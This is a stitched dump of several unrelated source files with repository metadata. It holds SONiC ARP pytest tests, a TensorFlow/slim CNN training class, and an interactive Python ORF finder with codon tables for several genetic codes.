yield duthost, ptfhost, int_facts, intf1, intf2, intf1_indice, intf2_indice
finally:
# Recover DUT interface IP address
config_reload(duthost, config_source='config_db', wait=120)
def test_arp_unicast_reply(common_setup_teardown):
duthost, ptfhost, int_facts, intf1, intf2, intf1_indice, intf2_indice = common_setup_teardown
# Start PTF runner and send correct unicast arp packets
clear_dut_arp_cache(duthost)
params = {
'acs_mac': int_facts['ansible_interface_facts'][intf1]['macaddress'],
'port': intf1_indice
}
log_file = "/tmp/arptest.VerifyUnicastARPReply.{0}.log".format(datetime.now().strftime("%Y-%m-%d-%H:%M:%S"))
ptf_runner(ptfhost, 'ptftests', "arptest.VerifyUnicastARPReply", '/root/ptftests', params=params, log_file=log_file)
# Get DUT arp table
switch_arptable = duthost.switch_arptable()['ansible_facts']
pytest_assert(switch_arptable['arptable']['v4']['10.10.1.3']['macaddress'] == '00:06:07:08:09:00')
pytest_assert(switch_arptable['arptable']['v4']['10.10.1.3']['interface'] == intf1)
def test_arp_expect_reply(common_setup_teardown):
duthost, ptfhost, int_facts, intf1, intf2, intf1_indice, intf2_indice = common_setup_teardown
params = {
'acs_mac': int_facts['ansible_interface_facts'][intf1]['macaddress'],
'port': intf1_indice
}
# Start PTF runner and send correct arp packets
clear_dut_arp_cache(duthost)
log_file = "/tmp/arptest.ExpectReply.{0}.log".format(datetime.now().strftime("%Y-%m-%d-%H:%M:%S"))
ptf_runner(ptfhost, 'ptftests', "arptest.ExpectReply", '/root/ptftests', params=params, log_file=log_file)
switch_arptable = duthost.switch_arptable()['ansible_facts']
pytest_assert(switch_arptable['arptable']['v4']['10.10.1.3']['macaddress'] == '00:06:07:08:09:0a')
pytest_assert(switch_arptable['arptable']['v4']['10.10.1.3']['interface'] == intf1)
def test_arp_no_reply_other_intf(common_setup_teardown):
duthost, ptfhost, int_facts, intf1, intf2, intf1_indice, intf2_indice = common_setup_teardown
# Check DUT won't reply ARP and install ARP entry when ARP request coming from other interfaces
clear_dut_arp_cache(duthost)
intf2_params = {
'acs_mac': int_facts['ansible_interface_facts'][intf2]['macaddress'],
'port': intf2_indice
}
log_file = "/tmp/arptest.SrcOutRangeNoReply.{0}.log".format(datetime.now().strftime("%Y-%m-%d-%H:%M:%S"))
ptf_runner(ptfhost, 'ptftests', "arptest.SrcOutRangeNoReply", '/root/ptftests', params=intf2_params, log_file=log_file)
switch_arptable = duthost.switch_arptable()['ansible_facts']
for ip in switch_arptable['arptable']['v4'].keys():
pytest_assert(ip != '10.10.1.4')
def test_arp_no_reply_src_out_range(common_setup_teardown):
duthost, ptfhost, int_facts, intf1, intf2, intf1_indice, intf2_indice = common_setup_teardown
params = {
'acs_mac': int_facts['ansible_interface_facts'][intf1]['macaddress'],
'port': intf1_indice
}
# Check DUT won't reply ARP and install ARP entry when src address is not in interface subnet range
clear_dut_arp_cache(duthost)
log_file = "/tmp/arptest.SrcOutRangeNoReply.{0}.log".format(datetime.now().strftime("%Y-%m-%d-%H:%M:%S"))
ptf_runner(ptfhost, 'ptftests', "arptest.SrcOutRangeNoReply", '/root/ptftests', params=params, log_file=log_file)
switch_arptable = duthost.switch_arptable()['ansible_facts']
for ip in switch_arptable['arptable']['v4'].keys():
pytest_assert(ip != '10.10.1.22')
def test_arp_garp_no_update(common_setup_teardown):
duthost, ptfhost, int_facts, intf1, intf2, intf1_indice, intf2_indice = common_setup_teardown
params = {
'acs_mac': int_facts['ansible_interface_facts'][intf1]['macaddress'],
'port': intf1_indice
}
# Test Gratuitous ARP behavior, no Gratuitous ARP installed when arp was not resolved before
clear_dut_arp_cache(duthost)
log_file = "/tmp/arptest.GarpNoUpdate.{0}.log".format(datetime.now().strftime("%Y-%m-%d-%H:%M:%S"))
ptf_runner(ptfhost, 'ptftests', "arptest.GarpNoUpdate", '/root/ptftests', params=params, log_file=log_file)
switch_arptable = duthost.switch_arptable()['ansible_facts']
for ip in switch_arptable['arptable']['v4'].keys():
pytest_assert(ip != '10.10.1.7')
# Test Gratuitous ARP update case, when received garp, no arp reply, update arp table if it was solved before
log_file = "/tmp/arptest.ExpectReply.{0}.log".format(datetime.now().strftime("%Y-%m-%d-%H:%M:%S"))
ptf_runner(ptfhost, 'ptftests', "arptest.ExpectReply", '/root/ptftests', params=params, log_file=log_file)
switch_arptable = duthost.switch_arptable()['ansible_facts']
pytest_assert(switch_arptable['arptable']['v4']['10.10.1.3']['macaddress'] == '00:06:07:08:09:0a')
pytest_assert(switch_arptable['arptable']['v4']['10.10.1.3']['interface'] == intf1)
time.sleep(2)
log_file = "/tmp/arptest.GarpUpdate.{0}.log".format(datetime.now().strftime("%Y-%m-%d-%H:%M:%S"))
ptf_runner(ptfhost, 'ptftests', "arptest.GarpUpdate", '/root/ptftests', params=params, log_file=log_file)
switch_arptable = duthost.switch_arptable()['ansible_facts']
pytest_assert(switch_arptable['arptable']['v4']['10.10.1.3']['macaddress'] == '00:00:07:08:09:0a')
pytest_assert(switch_arptable['arptable']['v4']['10.10.1.3']['interface'] == intf1)
def clear_dut_arp_cache(duthost):
duthost.shell('ip -stats neigh flush all')
def get_po(mg_facts, intf):
for k, v in mg_facts['minigraph_portchannels'].iteritems():
if intf in v['members']:
return k
return None
|
[
"noreply@github.com"
] |
status110.noreply@github.com
|
707a213f89027967bfe6dc6de5d54cf13c27992e
|
8d0af4af7a9b746c7fb81ef800965437c1c6cf1c
|
/nets/ResCNN.py
|
3b95e1b8141645a681214fe4e007506300b6337d
|
[] |
no_license
|
1069066484/NInRow
|
abcee034b81d6f2526ab6b4fa99a8f7726fd805f
|
863902fbb47e507a6c7ebdebb19376ebc80daf8d
|
refs/heads/master
| 2022-08-26T13:46:55.211522
| 2022-08-03T02:21:17
| 2022-08-03T02:21:17
| 190,905,699
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,773
|
py
|
"""
@Author: Zhixin Ling
@Description: A general and flexible CNN model.
"""
import tensorflow as tf
import tensorflow.contrib.slim as slim
from tensorflow.python.ops import control_flow_ops
from tensorflow.python import debug as tf_debug
import numpy as np
from sklearn.metrics import *
from data_utils import *
from global_defs import *
from tensorflow.contrib.slim import nets
class CNN:
class Params:
"""
cnns: a list with scalars(pooling layer) or two-element list(channels, kernel_size) as its element
fcs: a list of scalars, indicating neurons of fully connected layers. Set fcs to None if you don't want the
output flattened.
"""
def __init__(self, cnns, fcs):
self.cnns = cnns
self.fcs = fcs
def __str__(self):
return '[cnn:' + str(self.cnns) + ' fcs:' + str(self.fcs) + ']'
def construct(self, input, keep_prob=1.0, scope_prefix=""):
conv_cnt = 1
pool_cnt = 1
net = input
for param in self.cnns:
if isinstance(param, int):
net = slim.max_pool2d(net, [param,param], scope=scope_prefix + 'pool' + str(pool_cnt))
pool_cnt += 1
else:
net = slim.conv2d(net, param[0], [param[1],param[1]], scope=scope_prefix+'conv' + str(conv_cnt))
conv_cnt += 1
if self.fcs is None:
return net
net = slim.flatten(net)
for idx, param in enumerate(self.fcs):
net = slim.fully_connected(net, param, scope=scope_prefix+'fc' + str(idx))
net = slim.dropout(net, keep_prob=keep_prob)
return net
def __init__(self, cnn_params=Params([[16,5],2,[32,5],2], [1024]),
kp=0.5, lr_init=0.05, lr_dec_rate=0.95, batch_size=128,
epoch=10, verbose=False, act=tf.nn.relu, l2=5e-8, path=None,
resnet_v2=None):
"""
built_net: a resnet_v2. Like nets.resnet_v2.resnet_v2_50.
The input images first go through built_net and then the net constructed by CNN
"""
self.params = cnn_params
self.kp = kp
self.lr_init = lr_init
self.lr_dec_rate = lr_dec_rate
self.batch_size = batch_size
self.epoch = epoch
self.verbose = verbose
self.act = act
self.l2 = l2
self.path = None if path is None else mkdir(path)
self.sess = None
self.resnet_v2 = resnet_v2
self.ts = {}
self.var_names = ['kp', 'y', 'acc', 'is_train', 'pred', 'global_step', 'loss','x', 'train_step']
def print_vars(self):
variable_names = tf.global_variables()
for name in variable_names:
print(name)
op = self.graph.get_operations()
for i in op:
print(i)
def init_vars(self):
for ts in self.var_names:
self.ts[ts] = tf.get_collection(ts)[0]
def __str__(self):
return "CNN-- structure: {} \tkp: {} \tlr_init: {} \tlr_dec_rate: {} \tbatch_size: {} \tepoch: {} \tact: {}".format(
self.params, self.kp, self.lr_init, self.lr_dec_rate, self.batch_size, self.epoch, str(self.act).split(' ')[1] if self.act is not None else 'NONE')
def init_training_data(self, X, Y, reserve_test):
self.Y_min = np.min(Y)
if reserve_test is not None:
xy_tr, xy_te = labeled_data_split([X, Y], 1.0-reserve_test)
X, Y = xy_tr
X_te, Y_te = xy_te
self.X_te = X_te
self.Y_te = labels2one_hot(Y_te) + self.Y_min
else:
self.X_te = None
self.Y_te = None
self.X = X
self.Y = labels2one_hot(Y) + self.Y_min
def fit(self, X, Y, reserve_test=None, refresh_saving=False):
"""
If you wanna extract test set automatically, set reserve_test the ratio for test set
"""
self.init_training_data(X, Y, reserve_test)
self.construct_model()
self.init_sess(refresh_saving)
self.train()
def construct_model(self):
tf.reset_default_graph()
n_xs, slen = self.X.shape
slen = int(round(np.sqrt(slen)))
n_labels = self.Y.shape[1]
x = tf.placeholder(tf.float32, [None, slen*slen], name='x')
x_trans = tf.reshape(x, [-1, slen, slen, 1])
if self.resnet_v2 is not None:
x_trans = tf.image.grayscale_to_rgb(x_trans)
kp = tf.placeholder(tf.float32, [], name='kp')
y = tf.placeholder(tf.float32, [None, n_labels], name='y')
is_train = tf.placeholder(tf.bool, [], name='is_train')
net = x_trans
with slim.arg_scope([slim.conv2d, slim.fully_connected],
activation_fn=self.act,
normalizer_fn=tf.layers.batch_normalization,
normalizer_params={'training': is_train, 'momentum': 0.95},
weights_regularizer=slim.l2_regularizer(self.l2)):
if self.resnet_v2 is not None:
net, _ = self.resnet_v2(
net, num_classes=None, is_training=is_train, global_pool=True)
if self.params is not None:
net = self.params.construct(net, kp)
if len(net.shape) > 2:
net = slim.flatten(net)
logits = slim.fully_connected(net, n_labels, activation_fn=None, scope='logits')
pred = tf.argmax(logits,1, name='pred')
corrects = tf.equal(tf.argmax(logits,1),tf.argmax(y,1))
acc = tf.reduce_mean(tf.cast(corrects, tf.float32),name='acc')
cross_entropy = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits_v2(labels=y, logits=logits))
regularization_loss = tf.add_n(tf.losses.get_regularization_losses())
loss = tf.add(cross_entropy, regularization_loss, name='loss')
global_step = tf.get_variable("global_step", [], initializer=tf.constant_initializer(0.0), trainable=False)
lr = tf.train.exponential_decay(
self.lr_init,
global_step,
n_xs / self.batch_size, self.lr_dec_rate,
staircase=True)
optimizer = tf.train.AdamOptimizer(learning_rate=lr)
train_step = slim.learning.create_train_op(
loss, optimizer, global_step=global_step)
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
if update_ops:
updates = tf.group(*update_ops)
train_step = control_flow_ops.with_dependencies([updates], train_step)
locs = locals()
for var in self.var_names:
tf.add_to_collection(var, locs[var])
def next_batch(self):
batch_sz = self.batch_size
indices = list(range(self.curr_tr_batch_idx, self.curr_tr_batch_idx+batch_sz))
self.curr_tr_batch_idx = (batch_sz + self.curr_tr_batch_idx) % self.X.shape[0]
indices = [i%self.X.shape[0] for i in indices]
return [self.X[indices], self.Y[indices]]
def run_acc(self, X, Y):
correct_preds = 0.0
for batch_idx in range(0,X.shape[0],self.batch_size):
batch_idx_next = min(X.shape[0], batch_idx + self.batch_size)
batch_xs = X[batch_idx:batch_idx_next]
batch_ys = Y[batch_idx:batch_idx_next]
acc = self.sess.run(self.ts['acc'],feed_dict=
{self.ts['x']: batch_xs, self.ts['kp']: 1.0, self.ts['is_train']: False, self.ts['y']: batch_ys})
#print(acc, acc * (batch_idx_next - batch_idx), X.shape)
correct_preds += acc * (batch_idx_next - batch_idx)
return correct_preds / X.shape[0]
def init_sess(self, refresh_saving):
"""
return whether use new parameters
"""
if exists(join(self.path, '0.meta')):
tf.reset_default_graph()
sess = tf.Session()
self.saver = tf.train.import_meta_graph(join(self.path, '0.meta'))
print("Find the meta in file", self.path)
else:
print("Init new meta")
self.saver = tf.train.Saver()
sess = tf.Session()
sess.run(tf.global_variables_initializer())
self.init_vars()
self.sess = sess
if not refresh_saving and self.path is not None:
try:
self.saver.restore(sess,tf.train.latest_checkpoint(self.path))
print("Find the lastest check point in file", self.path)
return True
except:
print("Init new parameters")
return False
def train(self):
sess = self.sess
self.saver.save(sess, join(self.path, '0'), write_meta_graph=True)
self.curr_tr_batch_idx = 0
it_pep = round(self.X.shape[0] / self.batch_size)
x_t = self.ts['x']; kp_t = self.ts['kp']; y_t = self.ts['y']; is_train_t = self.ts['is_train'];
train_step_t = self.ts['train_step']; global_step_t = self.ts['global_step']
for i in range(round(self.epoch * self.X.shape[0] / self.batch_size)+1):
batch_xs, batch_ys = self.next_batch()
feed_dict = {x_t: batch_xs, kp_t: self.kp, y_t: batch_ys, is_train_t: True}
sess.run(train_step_t, feed_dict=feed_dict)
global_step = sess.run(global_step_t, feed_dict=feed_dict)
if self.verbose and global_step % it_pep == 0:
print("iteration:",i,' global_step:',global_step, ' train_acc: ',self.run_acc(self.X, self.Y), ' test_acc:',
-1.0 if self.X_te is None else self.run_acc(self.X_te, self.Y_te))
if self.path is not None:
self.saver.save(sess, self.path + '/model', global_step=global_step_t, write_meta_graph=False)
def predict(self, X):
if self.sess is None:
if not self.init_sess(False):
raise Exception("Error: trying to predict without trained network")
pred = self.sess.run(self.ts['pred'], feed_dict={self.ts['x']: X, self.ts['kp']: 1.0, self.ts['is_train']: False})
return pred
def main_mnist():
data, labels = read_mnist_dl()
# print(data.shape)
data = data[:5000]
labels = labels[:5000]
cnn = CNN(path='log_noresCNN',epoch=3, verbose=True, batch_size=4, resnet_v2=None)
cnn.fit(data, labels, 0.2)
def main_mnist_res():
data, labels = read_mnist_dl()
# print(data.shape)
data = data[:5000]
labels = labels[:5000]
cnn = CNN(path='log_resCNN',epoch=3, verbose=True, batch_size=4, resnet_v2=nets.resnet_v2.resnet_v2_50, cnn_params=None)
cnn.fit(data, labels, 0.2)
if __name__ == "__main__":
# main_mnist()
main_mnist_res()
|
[
"1069066484@qq.com"
] |
1069066484@qq.com
|
100a8d656e1a683ea0523ab5c362765c2fc4dabc
|
0de6c4d7492d69304e71887c50890f35a55acbf0
|
/ORF-0.99.py
|
2a28fe3fad3ecf550ded586c9f998b5ea98aad67
|
[] |
no_license
|
Omaramin81297/ORF-finder-translator
|
8539fc9ec883e8c2815f94deb94a7dee7ded23f9
|
4bb5e873f843dd6eb5f415f99c2c11dffed9f043
|
refs/heads/master
| 2020-09-21T06:15:49.936958
| 2019-11-28T18:57:07
| 2019-11-28T18:57:07
| 224,706,933
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 30,175
|
py
|
import re
# We print a welcome message, explaining the usage of this tool and its outcome and how do we choose from the choices given.
print('''Welcome to the ORF finder & DNA translator tool. this will help you find all possible open reading frames
and predicting their protein sequence.
The result of this program will be in a text file called completeframes which has all the info
about every single ORF in all frames.
It will also create 6 fasta files called orf_frame_n, n for each frame.
please choose any option you like by writing its number only. \n''')
# We make a while loop, in order to return to the start point if there's a user error. if there's none, the loop will be broken and the code is continued.
while True:
# Entering 1 will choose to input from file, 2 will choose to input from terminal
choice=input('''First, how would you like to enter your sequences?
1: Enter the sequences through a file
2: Enter them through the terminal
''')
# Make an error statement to show if the user didn't put anything
if choice=='':
print("\nError: You didn't choose an option!\n")
# Make an error statement to show if the user wrote something that isn't present in the choices above
elif choice not in ['1','2']:
print("\nError: Your entry isn't from the choices above!\n")
# If everything is fine, break the loop
else:
break
# A conditional where the file was chosen
if choice=='1':
# Another while loops for file error
while True:
while True:
# -fileo- is the name of the input file
fileo=input('\nInput file name with the extension: ')
# Error statement if the user skipped putting the file name
if fileo=='':
print("\nError: You didn't enter a file name!")
# If he wrote something:
else:
# We now try to see if this file exists or not, we test for python errors now
try:
fasta=open(fileo).read()
# If it doesn't exist, print this message
except IOError:
print('\nError: File not found in this directory!')
# If the file exists and everything is fine, break the loop and open the file
else:
break
# Using a patern, we find all sequences with its names inside the file and put it in variable -name_with_seq-, and we create
# two empty lists called -names- and -sequences-
name_with_seq=re.findall(r'>.*\n[\w\n]*',fasta)
names=[]
sequences=[]
# We take every string in the list and split it by the first \n, that will split between the name and the sequence
for i in name_with_seq:
# -one_name- is the name of the sequence and -one_seq- is the sequence, we append the name to -names- and the sequence to -sequences-
one_name,one_seq=re.split(r'\n',i,1)
names.append(one_name)
sequences.append(one_seq)
# -errornum- is used to break the big while loop if all the sequences in -sequences- have no wrong characters or errors
errornum=0
for i in range(0,len(sequences)):
invalid=re.search(r'[^ATGCatgcnN\n\s]',sequences[i])
if invalid:
print('Error: ('+names[i]+') has invalid DNA sequence characters at location '+str(invalid.start()+1))
errornum+=1
# If nothing's wrong, break the loop
if errornum==0:
break
# Make an empty list called -seqs_final-, this will be the last modified sequences which will be used in the code
seqs_final=[]
# Loop through every sequence in -sequences-
for i in sequences:
# Remove every newline from every sequence, and append the result to -seqs_final-
seqs_final.append(i.replace('\n','').replace(' ',''))
# A conditional where the manual input was chosen
if choice=='2':
names=[]
sequences=[]
seqs_final=[]
# We create something called -seqcounter- which will help us if the user didn't want to put a sequence name
seqcounter=1
# As long as the loop continues, the user can put as many sequences as he wants
while True:
# Input the name of the sequences
name=input('\nInput your sequence name or header (If you skip this, it will be named >Sequence number): ')
# If the user decided not to give it a name, it will be named >Sequence n, n for the value in seqcounter
if name=='':
name='>Sequence '+str(seqcounter)
# If the program didn't find the starter tag, it adds is automatically
if re.search(r'^>',name)==None:
name='>'+name
# Another loop to check for errors in the entered DNA sequence, I used here a special technique to solve the pasta problem
while True:
print('\nInput your DNA sequence for '+name+':')
seq=''
while True:
line=input('')
seq+=line
if line=='':
break
# If the user didn't enter a sequence, an error message will be printed
invalid=re.search(r'[^ATGCatgcnN\s]',seq)
if seq=='':
print("Error: You didn't enter a sequence!")
# If we found any character other than ATGC,atgc and N, an error message will be printed
elif invalid:
print('Error: Your DNA sequence has invalid characters at position '+str(invalid.start()+1))
# If all is ok, break the loop
else:
break
# Append the name to -names-
names.append(name)
# Append the sequence to -sequences-
sequences.append(seq)
# We now ask if the user wants to add more sequences
while True:
choicemaker=input('''\nDo you wish to enter more sequences?
1: Yes
2: No
''')
# We do the causual error handling here
if choicemaker not in ['1','2']:
print("\nError: Your entry isn't from the choices above!\n")
else:
break
# If we choose 1, -seqcounter- will be increased by one, so for example the second sequence will be >Sequence 2 if the user didn't choose a name
if choicemaker=='1':
seqcounter+=1
# If he chose 2, break the loop
elif choicemaker=='2':
break
# Loop through the manually entered sequences
for i in sequences:
# Remove all newlines and spaces
seqs_final.append(i.replace('\n','').replace(' ','').upper())
# Choose the genetic code number and assign it to -genetic_code_num-
while True:
genetic_code_num=input('''\nPlease choose your genetic code number:
1: Standard Code
2: Vertebrate Mitochondrial Code
3: Yeast Mitochondrial Code
4: Mold, Protozoan, and Coelenterate Mitochondrial Code and Mycoplasma/Spiroplasma Code
5: Invertebrate Mitochondrial Code
6: Ciliate, Dasycladacean and Hexamita Nuclear Code
7: Echinoderm and Flatworm Mitochondrial Code
8: Euplotid Nuclear Code
9: Bacterial, Archaeal and Plant Plastid Code
10: Alternative Yeast Nuclear Code
11: Ascidian Mitochondrial Code
12: Alternative Flatworm Mitochondrial Code
13: Chlorophycean Mitochondrial Code
14: Trematode Mitochondrial Code
15: Scenedesmus obliquus Mitochondrial Code
16: Thraustochytrium Mitochondrial Code
17: Pterobranchia Mitochondrial Code
18: Candidate Division SR1 and Gracilibacteria Code
19: Pachysolen tannophilus Nuclear Code
20: Karyorelict Nuclear Code
21: Condylostoma Nuclear Code
22: Mesodinium Nuclear Code
23: Peritrich Nuclear Code
24: Blastocrithidia Nuclear Code
25: Cephalodiscidae Mitochondrial UAA-Tyr Code
''')
# An error statement if user didn't choose anything
if genetic_code_num=='':
print("Error: You didn't choose a specific code!")
# An error statement when user puts anything other than a number or a number different than the choices
elif re.search(r'^[1-9]$|^1[0-9]$|^2[0-5]$',genetic_code_num)==None:
print("\nError: Your entry isn't from the choices above!")
else:
break
# Input the number of the minimum ORF size
while True:
n=input('\nPlease enter the minimum ORF length (you can skip this, it will be set automatically to 100 base pairs): ')
# Set to 100 if -n- is ''
if n=='':
n=100
break
# If it has a value, but it's not a number, we validate that by regex pattern and print an error and exit the program
elif re.search(r'\D',n):
print("Error: You didn't enter a valid number!")
# If everything is good, we make -n- an integer to use later on
else:
n=int(n)
break
# We make the user choose between three lettered amino acids and one lettered amino acids
while True:
letterchoice=input('''\nHow would you like to view the amino acids?
1: One letter amino acids
2: Three letters amino acids
''')
# Same error handling
if letterchoice=='':
print("Error: You didn't choose an amino acid view!")
elif letterchoice not in ['1','2']:
print("\nError: Your entry isn't from the choices above!\n")
else:
break
# Those are the dictionaries of the codes and the three letters to one letter amino acid dictionary
# End of dictionaries is at line 749
standard={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)|TGA',
'Cys':r'TG(T|C)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
vertebrate_mitochondria={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)|AG(A|G)',
'Cys':r'TG(T|C)',
'Trp':r'TGG|TGA',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)',
'Ile':r'AT(T|C)',
'Met':r'AT(G|A)',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
yeast_mitochondria={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)',
'Ser':r'TC(A|G|T|C)|AG(T|C|A|G)',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)',
'Cys':r'TG(T|C)',
'Trp':r'TGG|TGA',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)',
'Ile':r'AT(T|C)',
'Met':r'AT(G|A)',
'Thr':r'AC(A|G|T|C)|CT(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
mo_pro_co_mito_myco_spiro={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'AGC|AGT',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)',
'Cys':r'TG(T|C)',
'Trp':r'TGG|TGA',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'AGA|AGG',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
invertebrate_mitochondria={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'AG(A|G|T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)',
'Cys':r'TG(T|C)',
'Trp':r'TGG|TGA',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|T|C|G)',
'Ile':r'AT(T|C)',
'Met':r'AT(A|G)',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
cil_das_hexamita={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'TGA',
'Cys':r'TG(T|C)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'TA(A|G)|CA(A|G)',
'Arg':r'CG(A|T|C|G)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
echino_flat={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C|A|G)',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)',
'Cys':r'TG(T|C|A)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|T|C|G)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C|A)',
'Lys':r'AAG',
'_X_':r'N'}
euplotid_nuclear={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)',
'Cys':r'TG(T|C|A)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|T|C|G)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
bact_arch_plnt_plst={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|G|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)|TGA',
'Cys':r'TG(T|C)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
alt_yeast_nuc={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|T|C)',
'Ser':r'TC(A|G|T|C)|AG(T|C)|CTG',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)|TGA',
'Cys':r'TG(T|C)',
'Trp':r'TGG',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)|AG(A|G)',
'Ile':r'AT(T|C|A)',
'Met':r'ATG',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
ascid_mito={'Val':r'GT(A|G|T|C)',
'Ala':r'GC(A|G|T|C)',
'Asp':r'GA(T|C)',
'Glu':r'GA(G|A)',
'Gly':r'GG(A|G|T|C)|AG(A|G)',
'Phe':r'TT(T|C)',
'Leu':r'TT(A|G)|CT(A|T|C|G)',
'Ser':r'TC(A|G|T|C)|AG(T|C)',
'Tyr':r'TA(T|C)',
'Ter':r'TA(A|G)',
'Cys':r'TG(T|C)',
'Trp':r'TG(A|G)',
'Pro':r'CC(A|G|T|C)',
'His':r'CA(T|C)',
'Gln':r'CA(A|G)',
'Arg':r'CG(A|G|T|C)',
'Ile':r'AT(T|C)',
'Met':r'AT(G|A)',
'Thr':r'AC(A|G|T|C)',
'Asn':r'AA(T|C)',
'Lys':r'AA(A|G)',
'_X_':r'N'}
